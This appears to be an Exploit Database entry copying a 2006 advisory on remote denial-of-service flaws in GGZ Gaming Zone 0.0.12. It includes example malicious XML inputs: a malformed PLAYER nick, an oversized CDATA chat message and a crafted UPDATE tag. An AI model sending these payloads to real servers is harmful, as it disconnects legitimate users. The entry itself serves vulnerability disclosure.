GGZ Gaming Zone 0.0.12 - Multiple Denial of Service Vulnerabilities

EDB-ID:

27421




Platform:

Multiple

Date:

2006-03-14


source: https://www.securityfocus.com/bid/17094/info

GGZ Gaming Zone is prone to multiple remote denial-of-service vulnerabilities. These issues are due to improper input sanitization.

An attacker may cause the victim's connection to the server to terminate, causing a denial of service to legitimate users.

Examples have been provided:

<PLAYER ID='mynick'' TYPE='guest' TABLE='-1' LAG='1'/>

<CHAT TYPE='normal' FROM='mynick'><![CDATA[aaaaaaaaaaaaaaaaaaaaaaa...
...aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa_end_here
<UPDATE TYPE='player' ACTION='lag' ROOM='0'>